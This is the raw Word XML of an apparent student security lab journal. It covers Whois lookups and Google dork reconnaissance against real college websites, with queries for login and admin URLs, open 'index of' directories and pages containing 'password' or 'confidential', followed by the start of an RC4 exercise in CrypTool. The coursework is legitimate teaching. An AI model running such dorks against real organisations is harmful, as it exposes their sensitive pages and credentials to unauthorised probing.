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1599E" w14:textId="77777777" w:rsidR="00E15045" w:rsidRPr="00170CF1" w:rsidRDefault="00E15045" w:rsidP="00456A7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70CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Practical 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7847F0EA" w14:textId="77777777" w:rsidR="00570EE1" w:rsidRPr="00170CF1" w:rsidRDefault="00E15045" w:rsidP="00456A7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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
      <w:r w:rsidR="00570EE1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Google and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00570EE1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00570EE1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00570EE1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reconnaisasance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00570EE1" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF23E23" w14:textId="77777777" w:rsidR="00570EE1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Step 1: Open the Who.is website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46ABBE" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E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437689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496AB7AF" wp14:editId="53BDD8E5">
            <wp:extent cx="5314950" cy="2800350"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1905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7"/>
                    <a:srcRect b="3607"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5314950" cy="2800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38CFF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34D1F4" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00570EE1" w:rsidP="00456A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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 2: Enter the website name and hit the “Enter button”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186743C7" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A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9FDD5E" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00570EE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3AFCD614" wp14:editId="10AD922A">
            <wp:extent cx="5334000" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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C4235" w14:textId="77777777" w:rsidR="00570EE1" w:rsidRPr="00170CF1" w:rsidRDefault="00570EE1" w:rsidP="00456A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</w:pPr>
      <w:r w:rsidRPr="00170CF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Step 3: Show you information about </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidRPr="00170CF1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www.crickbuzz.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0784A3AE" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A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7F51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6DCD0103" wp14:editId="55B7AF30">
            <wp:extent cx="3832529" cy="3578087"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="2286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 rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="1431"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3864682" cy="3608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1897C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9941AA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3D3299D2" wp14:editId="66B5BD3B">
            <wp:extent cx="3832225" cy="2909463"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="24765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1"/>
                    <a:srcRect b="46015"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3868995" cy="2937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EA8B9" w14:textId="77777777" w:rsidR="00F24CBB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1C4EB6F1" wp14:editId="7ECF3D38">
            <wp:extent cx="4686300" cy="2734006"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
            <wp:docPr id="6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1"/>
                    <a:srcRect t="55909"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686300" cy="2734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B7BF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5A317A44" wp14:editId="31261520">
            <wp:extent cx="4532243" cy="4277802"/>
            <wp:effectExtent l="19050" t="19050" r="20955" b="2794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752" cy="4312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F02B3" w14:textId="77777777" w:rsidR="00A84841" w:rsidRPr="00170CF1" w:rsidRDefault="00A8484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3ED2708B" wp14:editId="6EC910C3">
            <wp:extent cx="5136543" cy="2202512"/>
            <wp:effectExtent l="19050" t="19050" r="26035" b="2667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 rotWithShape="1">
                    <a:blip r:embed="rId13"/>
                    <a:srcRect b="65430"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5146944" cy="2206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77CAC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569EB0" w14:textId="77777777" w:rsidR="00A84841" w:rsidRPr="00170CF1" w:rsidRDefault="00A8484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366A1709" wp14:editId="17F39A7E">
            <wp:extent cx="4746929" cy="4118775"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="1524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6148" cy="4126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2955C" w14:textId="77777777" w:rsidR="00570EE1" w:rsidRPr="00170CF1" w:rsidRDefault="00570EE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F8D8F1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A76C51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F3464D" w14:textId="77777777" w:rsidR="007E4A8C" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="007E4A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CF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B) </w:t>
      </w:r>
      <w:r w:rsidR="00761BE9" w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Google Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DCE0F2" w14:textId="77777777" w:rsidR="007E4A8C" w:rsidRPr="00170CF1" w:rsidRDefault="007E4A8C" w:rsidP="007E4A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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Basic site indexing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE901C" w14:textId="77777777" w:rsidR="00AF0D29" w:rsidRPr="00170CF1" w:rsidRDefault="00AF0D29" w:rsidP="007E4A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site:rtccs.edu.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17DB671A" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E5" w:rsidP="007E4A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0F1D9F" w14:textId="127592A8" w:rsidR="00AF0D29" w:rsidRPr="00170CF1" w:rsidRDefault="00A411B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761BE9"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B9A95D" wp14:editId="0FD7048B">
            <wp:extent cx="4369816" cy="4857750"/>
            <wp:effectExtent l="19050" t="19050" r="12065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447"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4373664" cy="4862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03A0B" w14:textId="77777777" w:rsidR="00AF0D29" w:rsidRPr="00170CF1" w:rsidRDefault="00AF0D2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EFBDAC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4C24C1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2B05F0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8F8B8D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E95F03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EED82C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206616" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E5" w:rsidP="007E4A8C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F9576C" w14:textId="77777777" w:rsidR="00A84841" w:rsidRPr="00170CF1" w:rsidRDefault="007E4A8C" w:rsidP="007E4A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CF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Search for document files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689BA6C5" w14:textId="77777777" w:rsidR="00761BE9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CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>filetype:pdf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site:https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://www.mu.ac.in/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3659B9EB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B3E4ADB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8E49D0" wp14:editId="4484B969">
            <wp:extent cx="3472295" cy="3717654"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="16510"/>
            <wp:docPr id="34" name="Picture 34" descr="C:\Users\Admin\Pictures\Screenshots\Screenshot 2026-02-20 084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2-20 0849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70"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3473956" cy="37194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A8F46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E7307E" w14:textId="77777777" w:rsidR="00014F81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CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>filetype:xls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site:https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://mum.digitaluniversity.ac/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="083C373B" w14:textId="77777777" w:rsidR="00014F81" w:rsidRPr="00170CF1" w:rsidRDefault="00014F8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1F83AA" w14:textId="77777777" w:rsidR="00014F81" w:rsidRPr="00170CF1" w:rsidRDefault="00761BE9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2EB828" wp14:editId="54A0F3B0">
            <wp:extent cx="4502727" cy="2308662"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="15875"/>
            <wp:docPr id="35" name="Picture 35" descr="C:\Users\Admin\Pictures\Screenshots\Screenshot 2026-02-20 084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2-20 0841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6"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4548341" cy="23320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AD133" w14:textId="77777777" w:rsidR="00AF0D29" w:rsidRPr="00170CF1" w:rsidRDefault="00A8484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0CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>filetype:docx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site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F084D18" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507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827B12" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507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A76AEF" wp14:editId="03714C3B">
            <wp:extent cx="5495925" cy="2412370"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="26035"/>
            <wp:docPr id="37" name="Picture 37" descr="C:\Users\Admin\Pictures\Screenshots\Screenshot 2026-02-20 084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2-20 08425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82"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5572068" cy="24457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823DB" w14:textId="77777777" w:rsidR="007E4A8C" w:rsidRPr="00170CF1" w:rsidRDefault="007E4A8C" w:rsidP="007E4A8C">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27443285" w14:textId="77777777" w:rsidR="00F24CBB" w:rsidRPr="00170CF1" w:rsidRDefault="007E4A8C" w:rsidP="007E4A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CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Search for login / admin URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52E75D" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t>inurl:login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t>site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82CCD3" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF8A62D" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73EA7F4C" wp14:editId="30BDB3C2">
            <wp:extent cx="5505450" cy="2966825"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="241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6-02-20 at 8.49.25 A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486" cy="2981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BD8ED" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8DC800" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670AC6A5" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2373A393" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:lastRenderedPageBreak/>
        <w:t>inurl:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t>site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26570D01" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="749AA797" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72255324" wp14:editId="107A275A">
            <wp:extent cx="3952875" cy="3945848"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="171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6-02-20 at 8.56.59 A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679" cy="3977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C4FF4" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15342679" w14:textId="77777777" w:rsidR="00A84841" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t>intitle:"login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:t>site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0CB4B9EA" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70" w:rsidP="00456A70">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4D0434" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="00A84841" w:rsidP="000C60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124940" wp14:editId="1058E26A">
            <wp:extent cx="4067175" cy="2248678"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="184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6-02-20 at 8.59.55 AM.jpe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54"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097527" cy="2265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6E93B" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="007E6D9E">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. Search for directory listings </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E2198" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="007E6D9E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170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>intitle:"index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> of" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F6BC804" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="007E6D9E">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E53A4F" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="007E6D9E">
      <w:pPr>
        <w:pStyle w:val="Default"/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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD8AF89" wp14:editId="48474656">
            <wp:extent cx="3781425" cy="4429125"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="285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2-23 at 11.19.40 AM.jpe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4" r="21795" b="3926"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3781425" cy="4429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E874" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="007E6D9E">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CB4785D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A79E7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35EE4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C5813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BA57E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8D5BF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CEDB5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8131D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241FD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A4387" w14:textId="77777777" w:rsidR="00667DE9" w:rsidRPr="00170CF1" w:rsidRDefault="00667DE9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D69DC" w14:textId="77777777" w:rsidR="000C60E5" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E5" w:rsidP="007E6D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2F244" w14:textId="77777777" w:rsidR="007E6D9E" w:rsidRPr="00170CF1" w:rsidRDefault="007E6D9E" w:rsidP="007E6D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Search for potential sensitive keywords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA4F045" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507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"password"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site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55A2718A" w14:textId="77777777" w:rsidR="00456A70" w:rsidRPr="00170CF1" w:rsidRDefault="00456A70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EA993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73D9CF0B" wp14:editId="5D35A0A5">
            <wp:extent cx="3343275" cy="2647950"/>
            <wp:effectExtent l="19050" t="19050" r="28575" b="1905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 rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="14540"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3343275" cy="264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5BEC1" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507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73ED24" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C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"confidential"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site:vesit.ves.ac.in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F5D8805" w14:textId="77777777" w:rsidR="00423294" w:rsidRPr="00170CF1" w:rsidRDefault="00423294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381117" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="000C60E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0A0C11" wp14:editId="37DA1FEB">
            <wp:extent cx="3305175" cy="3393393"/>
            <wp:effectExtent l="19050" t="19050" r="9525" b="171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6-02-20 at 11.23.14 AM.jpe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52"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3322725" cy="3411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48122" w14:textId="77777777" w:rsidR="0051507C" w:rsidRPr="00170CF1" w:rsidRDefault="0051507C" w:rsidP="000C60E5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Practical 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0AF734" w14:textId="71ECC6BC" w:rsidR="0051507C" w:rsidRDefault="0051507C" w:rsidP="00456A70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170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim: Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CryptTool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to encrypt and decrypt passwords using RC4 algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23911003" w14:textId="77777777" w:rsidR="005B10EF" w:rsidRPr="00170CF1" w:rsidRDefault="005B10EF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614977" w14:textId="0B72D480" w:rsidR="005B10EF" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="005B10E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 w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Click Encrypt/Decrypt Tab </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D181EA4" w14:textId="77777777" w:rsidR="005B10EF" w:rsidRPr="005B10EF" w:rsidRDefault="005B10EF" w:rsidP="005B10E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 w:rsidRPr="005B10EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Select Symmetric (Modern) </w:t>
      </w:r>
    </w:p>
